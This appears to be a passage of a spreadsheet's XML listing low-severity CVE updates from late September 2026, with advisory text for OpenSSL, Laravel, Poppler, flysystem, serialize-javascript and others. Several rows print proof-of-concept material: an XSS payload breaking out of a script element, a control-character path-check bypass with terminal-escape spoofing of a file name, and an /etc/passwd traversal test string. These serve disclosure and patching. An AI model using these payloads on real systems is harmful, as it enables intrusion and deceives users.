        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K109" s="5" t="inlineStr"/>
      <c r="L109" s="5" t="inlineStr"/>
      <c r="M109" s="5" t="inlineStr"/>
      <c r="N109" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O109" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P109" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q109" s="5" t="inlineStr"/>
      <c r="R109" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="S109" s="5" t="inlineStr">
        <is>
          <t>Confused deputy in DevTools in Google Chrome prior to 154.0.8037.57 allowed a remote attacker leveraging social engineering to bypass web origin policy via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="T109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95361</t>
        </is>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B110" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C110" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-35191</t>
        </is>
      </c>
      <c r="D110" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E110" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F110" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G110" s="5" t="inlineStr"/>
      <c r="H110" s="5" t="inlineStr"/>
      <c r="I110" s="5" t="inlineStr"/>
      <c r="J110" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K110" s="5" t="inlineStr"/>
      <c r="L110" s="5" t="inlineStr"/>
      <c r="M110" s="5" t="inlineStr"/>
      <c r="N110" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O110" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P110" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q110" s="5" t="inlineStr"/>
      <c r="R110" s="5" t="inlineStr">
        <is>
          <t>CWE-440</t>
        </is>
      </c>
      <c r="S110" s="5" t="inlineStr">
        <is>
          <t>Issue summary: The OpenSSL QUIC server, when configured to not preform address
validation, can be forced to count incoming packets multiple times in its
unvalidated credit computation, leading to a violation of the RFC 9000
unvalidated connection amplification limit of 3 times the amount of data
received.
Impact summary: A remote attacker able to spoof packets to a server using the
OpenSSL QUIC implementation might use the server for an amplification of
a DDoS attack.
CWE: CWE-440: Expected Behavior Violation 
Description: OpenSSL's QUIC stack, when operating as a server, enforces client
address validation (RFC 9000, Section 8), to confirm the peer address is not
used for a traffic amplification attack.  If this feature is disabled on the
server, the QUIC stack limits the amount of server data that can be sent to 3
times the amount of data received from the peer address, until such time as the
TLS handshake is completed.
The OpenSSL QUIC server, when operating in non-validation mode, adds the
length of the whole datagram received to the unvalidated credit limit when
processing each QUIC packet in the datagram. A remote peer may,
after establishing a connection with an initial client hello frame, send a
subsequent datagram containing multiple QUIC packets, leading the server to
account the entire datagram length for each packet in the datagram, resulting
in the server believing that the peer has sent more data than it actually has,
thereby violating the 3x amplification limit mandated by the RFC.
FIPS impact: no
As the QUIC stack lives outside the FIPS module boundary, no FIPS modules
are affected by this CVE.</t>
        </is>
      </c>
      <c r="T110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-35191</t>
        </is>
      </c>
    </row>
    <row r="111">
      <c r="A111" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B111" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C111" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102279</t>
        </is>
      </c>
      <c r="D111" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E111" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F111" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G111" s="5" t="inlineStr"/>
      <c r="H111" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I111" s="5" t="inlineStr"/>
      <c r="J111" s="5" t="inlineStr"/>
      <c r="K111" s="5" t="inlineStr"/>
      <c r="L111" s="5" t="inlineStr"/>
      <c r="M111" s="5" t="inlineStr"/>
      <c r="N111" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O111" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P111" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q111" s="5" t="inlineStr"/>
      <c r="R111" s="5" t="inlineStr">
        <is>
          <t>CWE-80</t>
        </is>
      </c>
      <c r="S111" s="5" t="inlineStr">
        <is>
          <t>Laravel is a web application framework. Prior to 12.69.0 and 13.30.0, Laravel exception debug pages with APP_DEBUG=true pass attacker-controlled input to a Tippy.js tooltip configured with allowHTML true, enabling DOM-based cross-site scripting when a user hovers over the tooltip. This issue is fixed in versions 12.69.0 and 13.30.0.</t>
        </is>
      </c>
      <c r="T111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102279</t>
        </is>
      </c>
    </row>
    <row r="112">
      <c r="A112" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B112" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C112" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97711</t>
        </is>
      </c>
      <c r="D112" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E112" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F112" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G112" s="5" t="inlineStr"/>
      <c r="H112" s="5" t="inlineStr"/>
      <c r="I112" s="5" t="inlineStr"/>
      <c r="J112" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K112" s="5" t="inlineStr"/>
      <c r="L112" s="5" t="inlineStr">
        <is>
          <t>npm:serialize-javascript</t>
        </is>
      </c>
      <c r="M112" s="5" t="inlineStr">
        <is>
          <t>7.1.2</t>
        </is>
      </c>
      <c r="N112" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O112" s="5" t="inlineStr"/>
      <c r="P112" s="5" t="inlineStr"/>
      <c r="Q112" s="5" t="inlineStr"/>
      <c r="R112" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-80</t>
        </is>
      </c>
      <c r="S112" s="5" t="inlineStr">
        <is>
          <t>### Impact
`serialize-javascript` escapes its output so it is safe to embed inside a
`&lt;script&gt;` element. In 7.1.1 that guarantee does not hold for **function
values**: a crafted function body can carry a literal, unescaped `&lt;/script&gt;`
into the output, terminating the script element early so the remainder is
parsed as HTML.
`SCRIPT_CLOSE_REGEXP` used `&lt;\/script[^&gt;]*&gt;` as its first alternative. The
character class excludes only `&gt;`, so a single match could run from one
`&lt;/script` all the way to the next `&gt;` anywhere in the source — swallowing a
second, complete `&lt;/script&gt;` along the way. Only one replacement is emitted
per match, and the plain-code branch neutralizes just the leading `&lt;`
(`'&lt; ' + match.slice(1)`), so the swallowed tag was re-emitted verbatim.
Reaching that shape requires `&lt;/script` in code position, which is legal
JavaScript: `x&lt;/script=+/` parses as `x &lt; /script=+/`, a comparison against a
regex literal.
```js
const serialize = require('serialize-javascript');
const src = "function f(x){ return x&lt;/script=+/ + '&lt;/script&gt;&lt;img src=x onerror=alert(1)&gt;' }";
const out = serialize({ h: new Function('return ' + src)() });
// {"h":function f(x){ return x&lt; /script=+/ + '&lt;/script&gt;&lt;img src=x onerror=alert(1)&gt;' }}
```
Embedded as the README documents (`&lt;script&gt;window.S = &lt;%= serialize(state) %&gt;&lt;/script&gt;`)
and parsed by Chromium, the script element ends at the injected tag and the
`&lt;img&gt;` becomes a live DOM node with its `onerror` handler executing in the
page origin.
Only the function path is affected. The same payload passed as **data** is
escaped correctly, and `options.isJSON` / non-function values are unaffected.
### Patches
Fixed in **7.1.2**. The wildcard now excludes `&lt;` as well as `&gt;`
(`[^&lt;&gt;]*`), so a match can never reach past a second `&lt;`. Every `&lt;/script`
in the source therefore either begins its own match or is followed by a
character the HTML tokenizer does not accept as ending a tag name — it ends
the tag name only on TAB, LF, FF, CR, SPACE, `/` or `&gt;`, and emits anything
else as text.
### Workarounds
Upgrade to **7.1.2**. If you cannot upgrade, 7.1.0 and earlier are
unaffected, or avoid serializing functions whose source text is
attacker-influenced.
### Regression note
This is a regression specific to 7.1.1, not a long-standing issue. 7.1.0 and
earlier applied the same wildcard but escaped the **entire** match, so no tag
survived. Downstream scanners defaulting to a `&gt;= 7.1.0` range would be
overly broad.</t>
        </is>
      </c>
      <c r="T112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97711</t>
        </is>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B113" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.3 → 2.1)</t>
        </is>
      </c>
      <c r="C113" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102842</t>
        </is>
      </c>
      <c r="D113" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E113" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F113" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G113" s="5" t="inlineStr"/>
      <c r="H113" s="5" t="inlineStr"/>
      <c r="I113" s="5" t="inlineStr"/>
      <c r="J113" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K113" s="5" t="inlineStr"/>
      <c r="L113" s="5" t="inlineStr"/>
      <c r="M113" s="5" t="inlineStr"/>
      <c r="N113" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O113" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P113" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q113" s="5" t="inlineStr"/>
      <c r="R113" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-434</t>
        </is>
      </c>
      <c r="S113" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in gedelumbung HospitalManagement up to c2d45543789a3887067d3915f69d44cfc2cf76a8. Affected by this issue is the function app_user_login_model.php::cekUserLogin of the file application/models/app_user_login_model.php of the component KCFinder File Manager. Such manipulation of the argument ADMIN_RS_KCFINDER leads to unrestricted upload. It is possible to launch the attack remotely. The exploit is publicly available and might be used. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102842</t>
        </is>
      </c>
    </row>
    <row r="114">
      <c r="A114" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B114" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (4.3 → 2.1)</t>
        </is>
      </c>
      <c r="C114" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102847</t>
        </is>
      </c>
      <c r="D114" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E114" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F114" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G114" s="5" t="inlineStr"/>
      <c r="H114" s="5" t="inlineStr"/>
      <c r="I114" s="5" t="inlineStr"/>
      <c r="J114" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K114" s="5" t="inlineStr"/>
      <c r="L114" s="5" t="inlineStr"/>
      <c r="M114" s="5" t="inlineStr"/>
      <c r="N114" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O114" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P114" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q114" s="5" t="inlineStr"/>
      <c r="R114" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="S114" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in gedelumbung HospitalManagement up to c2d45543789a3887067d3915f69d44cfc2cf76a8. The affected element is the function kirim of the file application/modules/web/controllers/buku_tamu.php of the component Guest Book. This manipulation of the argument nama/email/pesan causes cross site scripting. Remote exploitation of the attack is possible. The exploit has been published and may be used. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102847</t>
        </is>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B115" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (4.4 → 2.1)</t>
        </is>
      </c>
      <c r="C115" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102877</t>
        </is>
      </c>
      <c r="D115" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E115" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F115" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G115" s="5" t="inlineStr"/>
      <c r="H115" s="5" t="inlineStr"/>
      <c r="I115" s="5" t="inlineStr"/>
      <c r="J115" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K115" s="5" t="inlineStr"/>
      <c r="L115" s="5" t="inlineStr"/>
      <c r="M115" s="5" t="inlineStr"/>
      <c r="N115" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O115" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P115" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q115" s="5" t="inlineStr"/>
      <c r="R115" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S115" s="5" t="inlineStr">
        <is>
          <t>Fider before 0.38.0 contains a server-side request forgery vulnerability due to a time-of-check time-of-use gap in URL validation for webhooks and custom OAuth provider endpoints. Administrators controlling DNS can perform DNS rebinding attacks to make the Fider server send requests to internal services or cloud metadata endpoints.</t>
        </is>
      </c>
      <c r="T115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102877</t>
        </is>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B116" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (4.7 → 2.0)</t>
        </is>
      </c>
      <c r="C116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102771</t>
        </is>
      </c>
      <c r="D116" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E116" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F116" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G116" s="5" t="inlineStr"/>
      <c r="H116" s="5" t="inlineStr"/>
      <c r="I116" s="5" t="inlineStr"/>
      <c r="J116" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K116" s="5" t="inlineStr"/>
      <c r="L116" s="5" t="inlineStr"/>
      <c r="M116" s="5" t="inlineStr"/>
      <c r="N116" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O116" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P116" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q116" s="5" t="inlineStr"/>
      <c r="R116" s="5" t="inlineStr">
        <is>
          <t>CWE-1336, CWE-791</t>
        </is>
      </c>
      <c r="S116" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in Naichen ThinkCMF up to 8.0.7. Affected by this issue is the function MailController::templatePut of the file cmf-api/src/admin/controller/MailController.php of the component Email Template. The manipulation leads to improper neutralization of special elements used in a template engine. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102771</t>
        </is>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B117" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (2.7 → 2.0)</t>
        </is>
      </c>
      <c r="C117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102844</t>
        </is>
      </c>
      <c r="D117" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E117" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F117" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G117" s="5" t="inlineStr"/>
      <c r="H117" s="5" t="inlineStr"/>
      <c r="I117" s="5" t="inlineStr"/>
      <c r="J117" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K117" s="5" t="inlineStr"/>
      <c r="L117" s="5" t="inlineStr"/>
      <c r="M117" s="5" t="inlineStr"/>
      <c r="N117" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O117" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P117" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q117" s="5" t="inlineStr"/>
      <c r="R117" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-639</t>
        </is>
      </c>
      <c r="S117" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in gedelumbung HospitalManagement up to c2d45543789a3887067d3915f69d44cfc2cf76a8. This vulnerability affects the function detail of the file application/modules/admin/controllers/laporan_data_pasien.php. Executing a manipulation of the argument id_param can lead to authorization bypass. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102844</t>
        </is>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B118" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (4.7 → 2.0)</t>
        </is>
      </c>
      <c r="C118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102912</t>
        </is>
      </c>
      <c r="D118" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E118" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F118" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G118" s="5" t="inlineStr"/>
      <c r="H118" s="5" t="inlineStr"/>
      <c r="I118" s="5" t="inlineStr"/>
      <c r="J118" s="5" t="inlineStr"/>
      <c r="K118" s="5" t="inlineStr"/>
      <c r="L118" s="5" t="inlineStr"/>
      <c r="M118" s="5" t="inlineStr"/>
      <c r="N118" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O118" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P118" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q118" s="5" t="inlineStr"/>
      <c r="R118" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S118" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in SourceCodester Online Leave Management System 1.0. This issue affects some unknown processing of the file /admin/?page=reports. The manipulation of the argument date_start/date_end leads to sql injection. Remote exploitation of the attack is possible. The exploit is publicly available and might be used.</t>
        </is>
      </c>
      <c r="T118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102912</t>
        </is>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B119" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (3.3 → 1.9)</t>
        </is>
      </c>
      <c r="C119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102621</t>
        </is>
      </c>
      <c r="D119" s="5" t="n">
        <v>1.9</v>
      </c>
      <c r="E119" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F119" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G119" s="5" t="inlineStr"/>
      <c r="H119" s="5" t="inlineStr"/>
      <c r="I119" s="5" t="inlineStr"/>
      <c r="J119" s="5" t="inlineStr"/>
      <c r="K119" s="5" t="inlineStr"/>
      <c r="L119" s="5" t="inlineStr"/>
      <c r="M119" s="5" t="inlineStr"/>
      <c r="N119" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O119" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P119" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q119" s="5" t="inlineStr"/>
      <c r="R119" s="5" t="inlineStr">
        <is>
          <t>CWE-189, CWE-190</t>
        </is>
      </c>
      <c r="S119" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in Freedesktop Poppler up to 26.08.0. Affected is the function SplashClip::clipToPath of the file splash/SplashClip.cc. Such manipulation leads to integer overflow. The attack can only be performed from a local environment. The exploit is publicly available and might be used. Upgrading to version 26.09.0 is able to address this issue. The name of the patch is 323c91036d99926a8b90dc14329f7b40aece22f8. It is recommended to upgrade the affected component.</t>
        </is>
      </c>
      <c r="T119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102621</t>
        </is>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B120" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed</t>
        </is>
      </c>
      <c r="C120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102601</t>
        </is>
      </c>
      <c r="D120" s="5" t="inlineStr"/>
      <c r="E120" s="5" t="inlineStr"/>
      <c r="F120" s="5" t="inlineStr"/>
      <c r="G120" s="5" t="inlineStr"/>
      <c r="H120" s="5" t="inlineStr"/>
      <c r="I120" s="5" t="inlineStr"/>
      <c r="J120" s="5" t="inlineStr"/>
      <c r="K120" s="5" t="inlineStr"/>
      <c r="L120" s="5" t="inlineStr">
        <is>
          <t>composer:league/flysystem</t>
        </is>
      </c>
      <c r="M120" s="5" t="inlineStr">
        <is>
          <t>3.35.3</t>
        </is>
      </c>
      <c r="N120" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O120" s="5" t="inlineStr"/>
      <c r="P120" s="5" t="inlineStr"/>
      <c r="Q120" s="5" t="inlineStr"/>
      <c r="R120" s="5" t="inlineStr">
        <is>
          <t>CWE-150</t>
        </is>
      </c>
      <c r="S120" s="5" t="inlineStr">
        <is>
          <t>## Related public issue (context, not a duplicate)
Closed issue #1429 ("Handle non-UTF-8 paths", 2024-03-24) raised exactly this general concern and
even suggested detection via `preg_match('//u', $path) !== 1` -- note the reporter's suggested check
explicitly compares `!== 1`, which *would* correctly treat PCRE's `false` return as "reject." The
maintainer's reply pointed to the `PathNormalizer` interface as the place to implement this. The
control-character check that ended up shipping in `WhitespacePathNormalizer`
(`if (preg_match('#\p{C}+#u', $unixPath))`) addresses the general concern but does **not** use the
`!== 1`-style comparison the original issue suggested -- it uses a bare truthy check, which is exactly
the gap this report demonstrates. So this is not a duplicate of #1429; it's a concrete bypass
surviving in the fix that issue's concern led to.
## Vulnerability Details
**File**: `src/WhitespacePathNormalizer.php`, lines 22-28 (`normalizePath()`) -- the **default**
`PathNormalizer` used by `Filesystem` for every adapter (Local, FTP, SFTP, S3, AsyncAwsS3, Azure, GCS,
ZipArchive, GridFS, InMemory) unless the application supplies a custom one.
### Root Cause
```php
public function normalizePath(string $path): string
{
    $unixPath = str_replace('\\', '/', $path);
    if (preg_match('#\p{C}+#u', $unixPath)) {
        throw CorruptedPathDetected::forPath($path);
    }
    ...
```
`preg_match()` returns `false` (a PHP engine error) rather than `0` when the subject string is not
valid UTF-8 and the pattern uses the `/u` modifier -- PCRE can't even attempt the match. `false` and
`0` are both falsy in PHP, and `if (preg_match(...))` does not distinguish them. So a path containing
**any single invalid UTF-8 byte anywhere in the string** makes `preg_match()` fail with a "Malformed
UTF-8 characters" engine error, the `if` evaluates false, and `CorruptedPathDetected` is silently **not**
thrown -- even when the same string also contains literal control characters this exact check exists
to catch.
the identical payload IS correctly rejected once it's valid UTF-8:
```php
$n-&gt;normalizePath("foo\x1bbar");         // valid UTF-8, contains ESC -&gt; throws CorruptedPathDetected (correct)
$n-&gt;normalizePath("foo\x80\x1bbar");    // 0x80 = invalid lone UTF-8 continuation byte -&gt; NOT thrown (bypass)
```
The path-traversal protection is **unaffected** -- it's exact byte-string comparison on
`/`-delimited segments, independent of UTF-8 validity:
```php
$n-&gt;normalizePath("\x80/../../etc/passwd");   // still throws PathTraversalDetected
```
### Recommended Fix
```php
public function normalizePath(string $path): string
{
    $unixPath = str_replace('\\', '/', $path);
    $matched = preg_match('#\p{C}+#u', $unixPath);
    if ($matched !== 0) {
        // $matched === false means malformed UTF-8 -- must also be treated as corrupted,
        // not silently allowed through.
        throw CorruptedPathDetected::forPath($path);
    }
    ...
```
### Verification
Dynamically confirmed on `league/flysystem` HEAD `6837e1d` / tag `3.35.2`, PHP 8.4.22 CLI, end-to-end
through `LocalFilesystemAdapter`:
```
[1] write() succeeded -- normalizer did NOT reject the path.
[2] Actual bytes on disk: ...801b5b386d6e6f726d616c2d6c6f6f6b696e672d66696c652e7478741b5b306d...
[3] Filesystem::listContents() path contains raw ESC (0x1b): YES
[4] Raw terminal output (via `cat -v`): M-^@^[[8mnormal-looking-file.txt^[[0m^[[2K^[[1Aurgent-invoice.pdf</t>
        </is>
      </c>
      <c r="T120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102601</t>
        </is>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B121" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102820</t>
        </is>
      </c>
      <c r="D121" s="5" t="inlineStr"/>
      <c r="E121" s="5" t="inlineStr"/>
      <c r="F121" s="5" t="inlineStr"/>
      <c r="G121" s="5" t="inlineStr"/>
      <c r="H121" s="5" t="inlineStr"/>
      <c r="I121" s="5" t="inlineStr"/>
      <c r="J121" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K121" s="5" t="inlineStr"/>
      <c r="L121" s="5" t="inlineStr">
        <is>
          <t>rust:pageant</t>
        </is>
      </c>
      <c r="M121" s="5" t="inlineStr">
        <is>
          <t>0.2.3</t>
        </is>
      </c>
      <c r="N121" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O121" s="5" t="inlineStr"/>
      <c r="P121" s="5" t="inlineStr"/>
      <c r="Q121" s="5" t="inlineStr"/>
      <c r="R121" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-789</t>
        </is>
      </c>
      <c r="S121" s="5" t="inlineStr">
        <is>
          <t>## Summary
`MemoryMap::read` in the `pageant` crate (part of the russh workspace, used by
russh's SSH-agent client on Windows via `AgentClient::connect_pageant`) copies a
**peer-controlled** number of bytes out of an 8192-byte shared-memory view with
**no bounds check** — unlike the sibling `MemoryMap::write`, which correctly
rejects oversize access with `Error::Overflow`. The byte count comes straight
from a `u32` length prefix that the responding "Pageant" process writes into the
shared mapping. A malicious local process that answers as the Pageant agent can
therefore cause:
